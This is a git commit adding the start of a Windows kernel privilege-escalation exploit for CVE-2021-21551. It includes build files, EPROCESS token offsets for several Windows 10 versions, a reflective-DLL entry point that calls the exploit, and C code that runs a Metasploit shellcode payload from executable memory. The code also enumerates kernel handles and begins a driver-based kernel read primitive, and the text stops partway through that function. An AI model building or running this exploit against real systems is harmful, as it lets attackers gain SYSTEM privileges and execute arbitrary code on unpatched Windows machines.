Initial commit of CVE-2021-21551
This is still a work in progress but the initial requirements are falling into place.
This commit is contained in:
parent
59ba01e4a8
commit
7f0a1d1707
|
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.31205.134
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2021-21551", "CVE-2021-21551.vcxproj", "{49BF5C03-2BA1-49DC-BF5F-090172639200}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x64.Build.0 = Debug|x64
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Debug|x86.Build.0 = Debug|Win32
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x64.ActiveCfg = Release|x64
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x64.Build.0 = Release|x64
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x86.ActiveCfg = Release|Win32
|
||||
{49BF5C03-2BA1-49DC-BF5F-090172639200}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {5B88D6B4-8084-4B6A-A5F7-00912F52E630}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,237 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<ProjectGuid>{49bf5c03-2ba1-49dc-bf5f-090172639200}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>CVE_2021_21551</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(Configuration)\$(PlatformShortName)\</OutDir>
|
||||
<IntDir>$(Configuration)\$(PlatformShortName)\</IntDir>
|
||||
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;DEBUGTRACE;UMDF_USING_NTSTATUS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<GenerateMapFile>true</GenerateMapFile>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>false</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>NotUsing</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<SDLCheck>
|
||||
</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;RDLLTEMPLATE_EXPORTS;_WINDOWS;_USRDLL;UMDF_USING_NTSTATUS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>false</ConformanceMode>
|
||||
<PrecompiledHeaderFile>stdafx.h</PrecompiledHeaderFile>
|
||||
<AdditionalIncludeDirectories>..\ReflectiveDLLInjection\common;..\ReflectiveDLLInjection\dll\src;..\..\ReflectiveDLLInjection\common;..\..\ReflectiveDLLInjection\dll\src;..\..\..\ReflectiveDLLInjection\common;..\..\..\ReflectiveDLLInjection\dll\src;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||
<TreatWarningAsError>true</TreatWarningAsError>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<StringPooling>true</StringPooling>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableUAC>false</EnableUAC>
|
||||
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||
<GenerateMapFile>false</GenerateMapFile>
|
||||
<MapFileName>$(OutDir)$(TargetName).map</MapFileName>
|
||||
<ProgramDatabaseFile>$(OutDir)$(TargetName).pdb</ProgramDatabaseFile>
|
||||
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||
<ImportLibrary>$(OutDir)$(ProjectName).lib</ImportLibrary>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="dllmain.c" />
|
||||
<ClCompile Include="exploit.c">
|
||||
<CompileAs Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">CompileAsC</CompileAs>
|
||||
<CompileAs Condition="'$(Configuration)|$(Platform)'=='Release|x64'">CompileAsC</CompileAs>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="common.h" />
|
||||
<ClInclude Include="definitions.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,30 @@
|
|||
#pragma once
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <windows.h>
|
||||
|
||||
#ifdef DEBUGTRACE
|
||||
#define dprintf(...) real_dprintf(__VA_ARGS__)
|
||||
#else
|
||||
#define dprintf(...) do{}while(0);
|
||||
#endif
|
||||
|
||||
/*!
|
||||
* @brief Output a debug string to the debug console.
|
||||
* @details The function emits debug strings via `OutputDebugStringA`, hence all messages can be viewed
|
||||
* using Visual Studio's _Output_ window, _DebugView_ from _SysInternals_, or _Windbg_.
|
||||
*/
|
||||
static _inline void real_dprintf(char* format, ...)
|
||||
{
|
||||
va_list args;
|
||||
char buffer[1024];
|
||||
size_t len;
|
||||
_snprintf_s(buffer, sizeof(buffer), sizeof(buffer) - 1, "[%04x] ", GetCurrentThreadId());
|
||||
len = strlen(buffer);
|
||||
va_start(args, format);
|
||||
vsnprintf_s(buffer + len, sizeof(buffer) - len, sizeof(buffer) - len - 3, format, args);
|
||||
strcat_s(buffer, sizeof(buffer), "\r\n");
|
||||
OutputDebugStringA(buffer);
|
||||
va_end(args);
|
||||
}
|
|
@ -0,0 +1,96 @@
|
|||
#pragma once
|
||||
|
||||
#include <windows.h>
|
||||
#include <ntstatus.h>
|
||||
|
||||
#ifndef NTSTATUS
|
||||
typedef long NTSTATUS;
|
||||
#endif
|
||||
|
||||
typedef struct _EPROCESS_OFFSETS {
|
||||
WORD ActiveProcessLinks;
|
||||
WORD Token;
|
||||
WORD UniqueProcessId;
|
||||
} EPROCESS_OFFSETS;
|
||||
typedef EPROCESS_OFFSETS* PEPROCESS_OFFSETS;
|
||||
|
||||
const static EPROCESS_OFFSETS g_EprocessOffsets1803 = { 0x2f0, 0x360, 0x2e8 }; /* Windows 10 v1803 - v1909 */
|
||||
const static EPROCESS_OFFSETS g_EprocessOffsets2004 = { 0x448, 0x4b8, 0x440 }; /* Windows 10 v2004 - v20H2 */
|
||||
|
||||
typedef struct _MSF_PAYLOAD {
|
||||
DWORD dwSize;
|
||||
CHAR cPayloadData[];
|
||||
} MSF_PAYLOAD;
|
||||
typedef MSF_PAYLOAD* PMSF_PAYLOAD;
|
||||
|
||||
DWORD Exploit(PVOID pPayload);
|
||||
|
||||
// https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/handle_table_entry.htm?ts=0,80
|
||||
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
|
||||
USHORT UniqueProcessId;
|
||||
USHORT CreatorBackTraceIndex;
|
||||
UCHAR ObjectTypeIndex;
|
||||
UCHAR HandleAttributes;
|
||||
USHORT HandleValue;
|
||||
PVOID Object;
|
||||
ULONG GrantedAccess;
|
||||
} SYSTEM_HANDLE_TABLE_ENTRY_INFO;
|
||||
typedef SYSTEM_HANDLE_TABLE_ENTRY_INFO* PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
|
||||
|
||||
typedef struct _SYSTEM_HANDLE_INFORMATION {
|
||||
ULONG NumberOfHandles;
|
||||
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[];
|
||||
} SYSTEM_HANDLE_INFORMATION;
|
||||
typedef SYSTEM_HANDLE_INFORMATION* PSYSTEM_HANDLE_INFORMATION;
|
||||
|
||||
typedef enum _SYSTEM_INFORMATION_CLASS // this is an incomplete definition
|
||||
{
|
||||
SystemBasicInformation = 0, // 3.10 and higher
|
||||
SystemProcessorInformation = 1, // 3.10 and higher
|
||||
SystemPerformanceInformation = 2, // 3.10 and higher
|
||||
SystemTimeOfDayInformation = 3, // 3.10 and higher
|
||||
SystemPathInformation = 4, // 3.10 and higher
|
||||
SystemProcessInformation = 5, // 3.10 and higher
|
||||
SystemProcessorPerformanceInformation = 8, // 3.10 and higher
|
||||
SystemFlagsInformation = 9, // 3.10 and higher
|
||||
SystemCallTimeInformation = 10, // 3.10 and higher
|
||||
SystemModuleInformation = 11, // 3.10 and higher
|
||||
SystemLocksInformation = 12, // 3.10 and higher
|
||||
SystemStackTraceInformation = 13, // 3.10 and higher
|
||||
SystemPagedPoolInformation = 14, // 3.10 and higher
|
||||
SystemNonPagedPoolInformation = 15, // 3.10 and higher
|
||||
SystemHandleInformation = 16, // 3.10 and higher
|
||||
SystemExceptionInformation = 33, // 3.50 and higher
|
||||
SystemRegistryQuotaInformation = 37, // 3.51 and higher
|
||||
SystemLookasideInformation = 45, // 4.0 and higher
|
||||
SystemBigPoolInformation = 66, // 5.2 and higher
|
||||
SystemCodeIntegrityInformation = 103, // 6.0 and higher
|
||||
SystemQueryPerformanceCounterInformation = 124, // 6.1 and higher
|
||||
SystemKernelVaShadowInformation = 196, // 1803 and higher
|
||||
SystemSpeculationControlInformation = 201, // 1803 and higher
|
||||
} SYSTEM_INFORMATION_CLASS;
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtQuerySystemInformation)(
|
||||
SYSTEM_INFORMATION_CLASS SystemInformationClass,
|
||||
PVOID SystemInformation,
|
||||
ULONG SystemInformationLength,
|
||||
PULONG ReturnLength
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtCallbackReturn)(
|
||||
PVOID Result,
|
||||
ULONG ResultLength,
|
||||
NTSTATUS CallbackStateus
|
||||
);
|
||||
|
||||
typedef NTSTATUS(__stdcall* fNtUserConsoleControl)(
|
||||
DWORD ConsoleCtrl,
|
||||
PVOID ConsoleCtrlInfo,
|
||||
ULONG ConsoleCtrlInfoLength
|
||||
);
|
||||
|
||||
typedef VOID(__stdcall* fRtlGetNtVersionNumbers)(
|
||||
DWORD* MajorVersion,
|
||||
DWORD* MinorVersion,
|
||||
DWORD* BuildNumber
|
||||
);
|
|
@ -0,0 +1,37 @@
|
|||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||
#include "ReflectiveLoader.c"
|
||||
#include "definitions.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdint.h>
|
||||
#include <windows.h>
|
||||
|
||||
LPVOID main(LPVOID lpReserved) {
|
||||
Exploit(lpReserved);
|
||||
return;
|
||||
}
|
||||
|
||||
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
|
||||
{
|
||||
switch (dwReason)
|
||||
{
|
||||
case DLL_QUERY_HMODULE:
|
||||
hAppInstance = hinstDLL;
|
||||
if (lpReserved != NULL)
|
||||
{
|
||||
*(HMODULE*)lpReserved = hAppInstance;
|
||||
}
|
||||
break;
|
||||
case DLL_PROCESS_ATTACH:
|
||||
hAppInstance = hinstDLL;
|
||||
main(lpReserved);
|
||||
break;
|
||||
case DLL_PROCESS_DETACH:
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
|
@ -0,0 +1,157 @@
|
|||
#include "common.h"
|
||||
#include "definitions.h"
|
||||
|
||||
#include <tchar.h>
|
||||
|
||||
const EPROCESS_OFFSETS* g_pEprocessOffsets = NULL;
|
||||
fNtQuerySystemInformation NtQuerySystemInformation = NULL;
|
||||
fRtlGetNtVersionNumbers RtlGetNtVersionNumbers = NULL;
|
||||
|
||||
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
|
||||
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (!pPayload)
|
||||
return;
|
||||
CopyMemory(pPayload, &pMsfPayload->cPayloadData, pMsfPayload->dwSize);
|
||||
CreateThread(NULL, 0, pPayload, NULL, 0, NULL);
|
||||
}
|
||||
|
||||
BOOL ResolveRequirements(void) {
|
||||
HMODULE hNtdll = GetModuleHandle("ntdll");
|
||||
|
||||
if (hNtdll == NULL) {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
|
||||
if (NtQuerySystemInformation == NULL) {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
if (!(RtlGetNtVersionNumbers = (fRtlGetNtVersionNumbers)GetProcAddress(hNtdll, "RtlGetNtVersionNumbers"))) {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
/* get the version to determine the necessary eprocess offsets */
|
||||
DWORD dwMajor, dwMinor, dwBuild;
|
||||
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
|
||||
if (!((dwMajor == 10) && (dwMinor == 0))) {
|
||||
return FALSE;
|
||||
}
|
||||
dwBuild = LOWORD(dwBuild);
|
||||
/* older than v1803 */
|
||||
if (dwBuild < 17134) {
|
||||
return FALSE;
|
||||
}
|
||||
/* v1803 - v1909*/
|
||||
else if (dwBuild < 19041) {
|
||||
g_pEprocessOffsets = &g_EprocessOffsets1803;
|
||||
}
|
||||
/* v2004 - v20H2 */
|
||||
else if (dwBuild < 19043) {
|
||||
g_pEprocessOffsets = &g_EprocessOffsets2004;
|
||||
}
|
||||
else {
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
|
||||
PSYSTEM_HANDLE_TABLE_ENTRY_INFO GetHandleEntryInfo(HANDLE hHandle, DWORD dwProcessId) {
|
||||
HANDLE hProcessHeap = GetProcessHeap();
|
||||
DWORD dwSize = 4096;
|
||||
DWORD dwReturnSize = 0;
|
||||
PSYSTEM_HANDLE_INFORMATION pSystemHandles = NULL;
|
||||
PSYSTEM_HANDLE_TABLE_ENTRY_INFO pHandleEntryInfo = NULL;
|
||||
NTSTATUS Status = STATUS_UNSUCCESSFUL;
|
||||
|
||||
do {
|
||||
if (pSystemHandles) {
|
||||
HeapFree(hProcessHeap, 0, pSystemHandles);
|
||||
pSystemHandles = NULL;
|
||||
dwSize *= 2;
|
||||
}
|
||||
pSystemHandles = HeapAlloc(hProcessHeap, HEAP_ZERO_MEMORY, dwSize);
|
||||
if (pSystemHandles == NULL) {
|
||||
return NULL;
|
||||
}
|
||||
|
||||
Status = NtQuerySystemInformation(SystemHandleInformation, pSystemHandles, dwSize, &dwReturnSize);
|
||||
} while (Status == STATUS_INFO_LENGTH_MISMATCH);
|
||||
|
||||
if (Status != STATUS_SUCCESS) {
|
||||
HeapFree(hProcessHeap, 0, pSystemHandles);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
for (DWORD dwIndex = 0; dwIndex < pSystemHandles->NumberOfHandles; dwIndex++) {
|
||||
if (pSystemHandles->Handles[dwIndex].UniqueProcessId != dwProcessId) {
|
||||
continue;
|
||||
}
|
||||
if ((HANDLE)pSystemHandles->Handles[dwIndex].HandleValue != hHandle) {
|
||||
continue;
|
||||
}
|
||||
|
||||
if (pHandleEntryInfo = HeapAlloc(hProcessHeap, HEAP_ZERO_MEMORY, sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO))) {
|
||||
CopyMemory(pHandleEntryInfo, &pSystemHandles->Handles[dwIndex], sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO));
|
||||
}
|
||||
break;
|
||||
}
|
||||
HeapFree(hProcessHeap, 0, pSystemHandles);
|
||||
return pHandleEntryInfo;
|
||||
}
|
||||
|
||||
// this is a over-simplification of the primitives to just do a ULONG_PTR at a time
|
||||
// they can actually be used to transfer an arbitrary amount of data
|
||||
ULONG_PTR KernelRead(HANDLE hDriver, ULONG_PTR SrcAddr) {
|
||||
DWORD dwBytesReturned = 0;
|
||||
ULONG_PTR Request[4] = { 0, 0, 0, 0 };
|
||||
ULONG_PTR Response[4] = { 0, 0, 0, 0 };
|
||||
|
||||
Request[1] = SrcAddr;
|
||||
